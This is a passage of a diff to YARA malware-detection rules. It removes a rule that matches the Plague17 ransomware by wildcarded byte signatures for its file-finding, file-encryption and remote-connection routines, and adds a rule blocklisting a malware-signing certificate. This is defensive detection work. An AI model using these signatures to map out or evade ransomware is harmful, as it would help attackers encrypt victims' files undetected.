8B 80 ?? ?? ?? ?? FF D0 - 8B 45 ?? 8B E5 5D C3 - } - condition: - uint16(0)==0x5A4D and ((($v30_entrypoint at pe.entry_point) and $v30_api_load and $v30_calculate_hash and $v30_dll_load and $v30_1_find_file_1 and $v30_1_find_file_2 and $v30_1_encrypt_file_1 and $v30_1_encrypt_file_2 and $v30_1_encrypt_file_3) or (($v30_entrypoint at pe.entry_point) and $v30_api_load and $v30_calculate_hash and $v30_dll_load and $v30_2_find_file_1 and $v30_2_find_file_2 and $v30_2_encrypt_file_1 and $v30_2_encrypt_file_2 and $v30_2_encrypt_file_3) or (($v20_entrypoint at pe.entry_point) and $v30_api_load and $v30_calculate_hash and $v30_dll_load and $v30_2_find_file_1 and $v30_2_find_file_2 and $v20_1_encrypt_file_1 and $v20_1_encrypt_file_2 and $v20_1_encrypt_file_3) or (($v30_entrypoint at pe.entry_point) and $v30_api_load and $v30_calculate_hash and $v30_dll_load and $v30_3_find_file_1 and $v30_3_find_file_2 and $v30_3_encrypt_file_1 and $v30_3_encrypt_file_2 and $v30_3_encrypt_file_3)) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Beijing Caiyunshidai Technology Co., Ltd." and pe.signatures[i].serial=="25:be:f2:84:67:e4:75:03:31:d2:f4:03:45:81:13:b8" and 1474156800<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Plague17 : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_0296Cf3314F434C5B74D0C3E36616Dd1 : INFO FILE { meta: - description = "Yara rule that detects Plague17 ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "065c47b5-f459-529e-8046-7394a742b50a" - date = "2021-02-19" - modified = "2021-02-19" + id = "ae7d8c3c-0ac8-5ea5-8013-97ccb2ace4e4" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.Plague17.yara#L1-L263" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "e0e518fc83a62d70b83df273c6ba469e6f0fdf9c035126428ec7561e04437b6f" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L13584-L13600" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "acf3b7460c79fa71c1b131b26a40bbc286c9da0a5fe7071bbe8b386a3ca91de4" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Plague17" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $find_files_p1 = { - 55 89 E5 57 56 8D 85 ?? ?? ?? ?? 53 81 EC ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 31 C0 66 89 - 85 ?? ?? ?? ?? 8B 45 ?? 89 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8B 50 ?? 8B - 00 66 83 7C 50 ?? ?? 74 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? BA ?? ?? ?? - ?? 2B 51 ?? 39 D0 0F 87 ?? ?? ?? ?? 8B 4D ?? 89 44 24 ?? C7 04 24 ?? ?? ?? ?? E8 ?? - ?? ?? ?? 8B 45 ?? 8B 7D ?? 83 EC ?? 8B 00 8B 57 ?? 8D 8D ?? ?? ?? ?? 8D 14 50 C6 44 - 24 ?? ?? 89 04 24 89 8D ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 89 54 24 ?? E8 ?? ?? ?? ?? 83 - EC ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 2B 95 ?? ?? ?? ?? 39 D0 0F - 87 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 89 44 24 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D - 85 ?? ?? ?? ?? 83 EC ?? 8D 8D ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? - 8B 85 ?? ?? ?? ?? 83 EC ?? 39 F8 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 8B 7D ?? 8D - } - $find_files_p2 = { - 9D ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? 89 D9 8B 00 C6 44 24 ?? ?? 8B 57 ?? 89 B5 ?? ?? ?? - ?? 89 04 24 8D 14 50 89 54 24 ?? E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 83 EC ?? 89 1C 24 - E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 EC ?? 39 F0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 85 - ?? ?? ?? ?? 89 5C 24 ?? 89 04 24 FF 15 ?? ?? ?? ?? 83 EC ?? 83 F8 ?? 89 C6 0F 84 ?? - ?? ?? ?? 8D BD ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 3C 24 E8 ?? ?? ?? ?? 85 C0 74 - ?? C7 44 24 ?? ?? ?? ?? ?? 89 3C 24 E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 45 ?? F6 85 ?? ?? - ?? ?? ?? 89 7C 24 ?? 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 04 24 0F 85 ?? ?? ?? ?? E8 ?? - ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? - ?? 8D 8D ?? ?? ?? ?? 83 EC ?? 39 C8 74 ?? 89 04 24 E8 ?? ?? ?? ?? EB ?? C7 44 24 ?? - ?? ?? ?? ?? 89 3C 24 E8 ?? ?? ?? ?? 85 C0 75 ?? 89 5C 24 ?? 89 34 24 FF 15 ?? ?? ?? - ?? 83 EC ?? 85 C0 75 ?? 89 34 24 FF 15 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 9D ?? ?? ?? - ?? 83 EC ?? 39 D8 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8D 65 ?? 5B 5E 5F 5D C2 ?? ?? 8D 76 - ?? 8D BC 27 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 3C 24 E8 ?? ?? ?? ?? 85 C0 74 - } - $find_files_p3 = { - 8B 45 ?? F6 85 ?? ?? ?? ?? ?? 89 7C 24 ?? 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 04 24 75 - ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? E9 ?? - ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? - 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 83 EC ?? 39 D0 0F 85 ?? ?? ?? ?? E9 ?? ?? ?? ?? - E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? EB ?? 89 - C3 8B 85 ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? 39 F0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 85 ?? - ?? ?? ?? 8D B5 ?? ?? ?? ?? 39 F0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 89 1C 24 E8 ?? ?? ?? - ?? EB ?? 89 C3 8B 85 ?? ?? ?? ?? 39 F0 75 ?? EB ?? EB ?? EB ?? 89 C3 EB ?? C7 04 24 - ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? EB - } - $encrypt_files_p1 = { - 55 89 E5 57 56 53 81 EC ?? ?? ?? ?? 8B 45 ?? 89 8D ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? - ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 - ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 00 89 04 24 FF 15 ?? ?? ?? ?? 83 EC ?? 83 - F8 ?? 89 85 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 89 C6 8D 85 ?? ?? ?? ?? 8D BD ?? ?? ?? ?? - 89 34 24 89 44 24 ?? FF 15 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 EC ?? 8B 95 ?? ?? ?? ?? - 89 7C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 89 34 24 05 ?? ?? ?? ?? 89 85 - ?? ?? ?? ?? 89 44 24 ?? 83 D2 ?? A1 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 89 54 24 ?? 89 85 - ?? ?? ?? ?? FF D0 31 C0 83 EC ?? 83 BD ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? F3 AB 7C ?? 0F - 8E ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 - ?? ?? ?? ?? ?? 89 44 24 ?? 8B 85 ?? ?? ?? ?? 89 74 24 ?? 89 04 24 FF 15 ?? ?? ?? ?? - 83 EC ?? 8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 83 EC ?? 85 C0 0F - 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 35 ?? ?? ?? ?? 0B 85 ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? - 80 7D ?? ?? 0F 85 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 C3 8D 85 ?? ?? - ?? ?? 89 D9 89 04 24 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 95 ?? ?? - ?? ?? 83 EC ?? 8B B5 ?? ?? ?? ?? 89 D9 89 85 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 8B 85 ?? - ?? ?? ?? 8B 95 ?? ?? ?? ?? 89 1E 0F A4 C2 ?? C1 E0 ?? 89 95 ?? ?? ?? ?? 89 85 ?? ?? - ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? - ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D - } - $encrypt_files_p2 = { - 85 ?? ?? ?? ?? 89 04 24 8B 0E E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 EC ?? 89 04 24 8B - 85 ?? ?? ?? ?? 89 44 24 ?? 8B 85 ?? ?? ?? ?? 89 44 24 ?? 8B 85 ?? ?? ?? ?? 89 44 24 - ?? 8B 0E E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 83 EC ?? 89 04 24 89 54 - 24 ?? 8B 0E 8D B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B BD ?? ?? ?? ?? 83 EC ?? 8B 85 ?? ?? - ?? ?? 85 FF 0F 84 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 95 - ?? ?? ?? ?? 8D BD ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 7C 24 ?? 89 44 24 ?? 8B 85 - ?? ?? ?? ?? 89 54 24 ?? 89 04 24 FF 95 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? C7 04 24 ?? - ?? ?? ?? E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 89 - 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 2B 85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? - 1B 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 0F AC D0 ?? C1 EA ?? 89 D3 09 - C3 0F 84 ?? ?? ?? ?? 83 C0 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? - ?? ?? 89 85 ?? ?? ?? ?? A1 ?? ?? ?? ?? 83 D2 ?? 89 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? - 90 8D B4 26 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 74 24 ?? C7 44 - 24 ?? ?? ?? ?? ?? 89 44 24 ?? 8B 85 ?? ?? ?? ?? 89 04 24 FF 95 ?? ?? ?? ?? 8B 8D ?? - ?? ?? ?? 8B 9D ?? ?? ?? ?? 83 EC ?? 8B 95 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 5C - } - $encrypt_files_p3 = { - 24 ?? 89 0C 24 8B 0A E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 83 EC ?? 8B - 9D ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 7C 24 ?? 89 44 24 ?? 89 54 24 ?? 89 1C 24 - FF 95 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 83 EC ?? 89 9D ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? - ?? 89 74 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 1C 24 89 4C 24 ?? FF 15 ?? ?? ?? ?? 8B 85 - ?? ?? ?? ?? 83 EC ?? 8B 95 ?? ?? ?? ?? 8D 9D ?? ?? ?? ?? 81 85 ?? ?? ?? ?? ?? ?? ?? - ?? C7 44 24 ?? ?? ?? ?? ?? 83 95 ?? ?? ?? ?? ?? 89 44 24 ?? 8B 85 ?? ?? ?? ?? 89 5C - 24 ?? 89 54 24 ?? 89 04 24 FF 95 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 9D ?? ?? ?? ?? 83 - EC ?? 81 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 D9 83 95 ?? ?? ?? ?? ?? 8B 02 89 04 24 E8 ?? - ?? ?? ?? 8B 9D ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 83 EC ?? 8B 95 ?? ?? ?? ?? 8B 85 ?? ?? - ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 89 8D - ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 8B 0B 89 85 ?? ?? - ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 04 24 8B 0B E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? - ?? 83 EC ?? 89 04 24 8B 85 ?? ?? ?? ?? 89 44 24 ?? 8B 85 ?? ?? ?? ?? 89 44 24 ?? 8B - 85 ?? ?? ?? ?? 89 44 24 ?? 8B 0B E8 ?? ?? ?? ?? 8B 0B 83 EC ?? E8 ?? ?? ?? ?? 8B 9D - ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? C7 44 24 ?? ?? ?? - ?? ?? 89 74 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 54 24 ?? 89 1C 24 FF 15 ?? ?? ?? ?? 8B - } - $encrypt_files_p4 = { - 85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 83 EC ?? C7 44 24 ?? ?? ?? ?? ?? 89 7C 24 ?? 89 1C - 24 89 44 24 ?? 89 54 24 ?? FF 95 ?? ?? ?? ?? 83 EC ?? 83 85 ?? ?? ?? ?? ?? 8B 9D ?? - ?? ?? ?? 83 95 ?? ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? - 31 CB 31 D0 89 DA 09 C2 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 2B 85 ?? ?? ?? ?? 8B 95 - ?? ?? ?? ?? 1B 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? - 8B 85 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 74 24 ?? 89 4C 24 ?? 8B 8D ?? ?? ?? ?? - 89 C3 89 44 24 ?? 89 0C 24 FF 95 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 83 EC ?? 8B 85 ?? ?? - ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 54 24 ?? 8B 95 ?? ?? ?? ?? 89 14 24 8B 08 E8 ?? ?? - ?? ?? 83 EC ?? 8B 85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 89 7C 24 ?? 8B BD ?? ?? ?? ?? C7 - 44 24 ?? ?? ?? ?? ?? 89 44 24 ?? 89 54 24 ?? 89 3C 24 FF 95 ?? ?? ?? ?? 83 EC ?? 8B - 95 ?? ?? ?? ?? 89 BD ?? ?? ?? ?? 89 5C 24 ?? 8B 1D ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? - ?? 89 74 24 ?? 89 54 24 ?? 89 3C 24 89 9D ?? ?? ?? ?? FF D3 8B 95 ?? ?? ?? ?? 8B 85 - ?? ?? ?? ?? 8D 9D ?? ?? ?? ?? 83 EC ?? B9 ?? ?? ?? ?? C7 85 - } - $encrypt_files_p5 = { - 89 DF C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 0F AC D0 ?? C1 EA - ?? 01 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 11 95 ?? ?? ?? ?? 31 C0 C7 85 ?? - ?? ?? ?? ?? ?? ?? ?? F3 AB C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? C7 85 ?? ?? - ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 45 - ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? C7 44 24 ?? ?? - ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 89 54 24 ?? E8 ?? ?? ?? ?? 8B BD ?? ?? ?? - ?? C7 44 24 ?? ?? ?? ?? ?? 89 44 24 ?? 89 5C 24 ?? C7 04 24 ?? ?? ?? ?? 89 85 ?? ?? - ?? ?? 89 7C 24 ?? E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 31 C0 F3 AB 8B BD ?? ?? ?? ?? 89 74 - 24 ?? 8D B5 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 74 24 ?? - 89 3C 24 FF 95 ?? ?? ?? ?? 83 EC ?? 89 3C 24 FF 15 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 - EC ?? 8B 18 85 DB 74 ?? 89 D9 E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 1C 24 E8 ?? - ?? ?? ?? 8B 85 ?? ?? ?? ?? C7 00 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? - ?? 8D 65 ?? 31 C0 5B 5E 5F 5D C2 ?? ?? 8D BD ?? ?? ?? ?? 31 C0 B9 ?? ?? ?? ?? 8B B5 - ?? ?? ?? ?? 31 D2 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? F3 AB 8B BD ?? ?? ?? ?? C7 85 ?? ?? - ?? ?? ?? ?? ?? ?? 89 F9 C1 F9 ?? 83 E1 ?? 89 C8 01 F0 11 FA 0F AC D0 ?? C1 FA ?? 83 - } - $encrypt_files_p6 = { - C0 ?? 83 D2 ?? 0F A4 C2 ?? C1 E0 ?? 89 95 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 89 FA 09 F2 - 89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8D 85 ?? ?? - ?? ?? 8D 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 F7 C6 00 ?? 83 C0 ?? 39 C2 75 ?? 89 BD - ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 C3 8B 85 ?? ?? ?? ?? 89 D9 89 04 - 24 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 EC ?? 89 18 A1 ?? ?? ?? ?? 89 44 24 ?? 8D 85 - ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? 89 - 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 75 ?? 83 C0 - ?? 83 EC ?? 8B 56 ?? 39 D0 0F 87 ?? ?? ?? ?? 8B 7D ?? 29 C2 8D B5 ?? ?? ?? ?? 8D 9D - ?? ?? ?? ?? 8B 0F C6 44 24 ?? ?? 89 9D ?? ?? ?? ?? 8D 0C 41 8D 04 51 89 0C 24 89 F1 - 89 44 24 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 EC ?? 89 34 24 8D 48 ?? E8 ?? ?? ?? - ?? 8B 85 ?? ?? ?? ?? 83 EC ?? 39 D8 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B BD ?? ?? ?? ?? - 8D B5 ?? ?? ?? ?? 8D 9D ?? ?? ?? ?? 8B 47 ?? 89 34 24 89 44 24 ?? E8 ?? ?? ?? ?? 8B - 85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 0F C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? - ?? ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 66 90 89 34 24 8B - 0F 83 C6 ?? E8 ?? ?? ?? ?? 83 EC ?? 39 DE 75 ?? 8B BD ?? ?? ?? ?? 8B B5 - } - $encrypt_files_p7 = { - 8B 0F E8 ?? ?? ?? ?? 8B 07 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? - ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 - 04 24 E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 83 EC ?? 8B 85 ?? ?? ?? ?? - 8B 9D ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 8B 0F 89 95 ?? ?? ?? ?? 89 95 - ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? - E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 04 24 8B 0F E8 ?? ?? ?? ?? 8B 0F 83 EC ?? E8 ?? - ?? ?? ?? 8B 0F 89 F7 E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 95 ?? ?? - ?? ?? 8B 95 ?? ?? ?? ?? 89 34 24 8D B5 ?? ?? ?? ?? 89 44 24 ?? 8B 85 ?? ?? ?? ?? C7 - 44 24 ?? ?? ?? ?? ?? 89 54 24 ?? 89 44 24 ?? FF 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 83 - EC ?? 89 3C 24 C7 44 24 ?? ?? ?? ?? ?? 89 74 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 44 24 - ?? FF 15 ?? ?? ?? ?? 8B BD ?? ?? ?? ?? 83 EC ?? 8B 85 ?? ?? ?? ?? 85 FF 0F 85 ?? ?? - ?? ?? 3D ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 3D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? - 0F 87 ?? ?? ?? ?? 3D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 3D - ?? ?? ?? ?? 0F 97 C0 0F B6 C0 89 85 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 65 ?? B8 ?? ?? ?? - ?? 5B 5E 5F 5D C2 ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 FF 15 ?? ?? ?? ?? 83 EC ?? 8D 65 - ?? B8 ?? ?? ?? ?? 5B 5E 5F 5D C2 ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 FF 15 - } - $encrypt_files_p8 = { - 83 EC ?? 8D 65 ?? 31 C0 5B 5E 5F 5D C2 ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 - 04 24 ?? ?? ?? ?? 89 C6 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 04 24 C1 F8 ?? 89 F1 89 - 44 24 ?? 8D B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 83 EC ?? 89 B5 ?? ?? ?? - ?? 89 85 ?? ?? ?? ?? 89 C3 A1 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 85 - ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8B BD ?? ?? ?? ?? 89 - 04 24 89 54 24 ?? 89 74 24 ?? 89 7C 24 ?? E8 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8B BD ?? - ?? ?? ?? 89 95 ?? ?? ?? ?? 89 54 24 ?? 89 85 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 - 7C 24 ?? 89 44 24 ?? 89 34 24 FF 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 EC ?? 89 5C 24 - ?? C7 44 24 ?? ?? ?? ?? ?? 83 C3 ?? C7 44 24 ?? ?? ?? ?? ?? 89 34 24 89 44 24 ?? FF - 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 83 EC ?? 39 C3 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? - C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 76 ?? 81 BD ?? ?? - ?? ?? ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? E9 ?? ?? ?? ?? A1 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? - E9 ?? ?? ?? ?? 89 54 24 ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? - E8 ?? ?? ?? ?? 89 C6 C7 44 24 ?? ?? ?? ?? ?? 89 1C 24 E8 ?? ?? ?? ?? 89 34 24 E8 ?? - ?? ?? ?? 89 C3 8B 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 89 1C 24 E8 ?? ?? ?? ?? EB - } - $remote_connection_p1 = { - 55 57 56 53 81 EC ?? ?? ?? ?? 8B 1A 39 18 0F 84 ?? ?? ?? ?? 89 54 24 ?? 89 C6 8D 5C - 24 ?? F6 05 ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? B8 ?? ?? ?? ?? 89 DF 8B 56 ?? 89 54 24 - ?? 8B 56 ?? 89 54 24 ?? 8B 56 ?? 89 54 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 44 24 ?? 89 - 3C 24 E8 ?? ?? ?? ?? 89 3C 24 E8 ?? ?? ?? ?? 01 C7 89 F8 29 D8 BA ?? ?? ?? ?? 89 D5 - 29 C5 F6 05 ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 8B 06 89 44 24 ?? 8B 46 ?? 89 44 24 ?? - C7 44 24 ?? ?? ?? ?? ?? 89 6C 24 ?? 89 3C 24 E8 ?? ?? ?? ?? 89 5C 24 ?? 8B 7C 24 ?? - 8B 07 89 04 24 E8 ?? ?? ?? ?? FF 47 ?? 8B 46 ?? 01 47 ?? 8B 6E ?? 85 ED 0F 84 ?? ?? - ?? ?? 89 6C 24 ?? 8D 44 24 ?? 89 04 24 E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? E9 ?? - ?? ?? ?? 8D B6 ?? ?? ?? ?? 8D BC 27 ?? ?? ?? ?? 85 C0 74 ?? C6 03 ?? A8 ?? 0F 85 ?? - ?? ?? ?? 8B 7D ?? 8B 75 ?? 89 2C 24 E8 ?? ?? ?? ?? 89 7C 24 ?? 89 74 24 ?? 89 44 24 - ?? C7 44 24 ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? 8B 74 24 ?? 29 F0 89 44 24 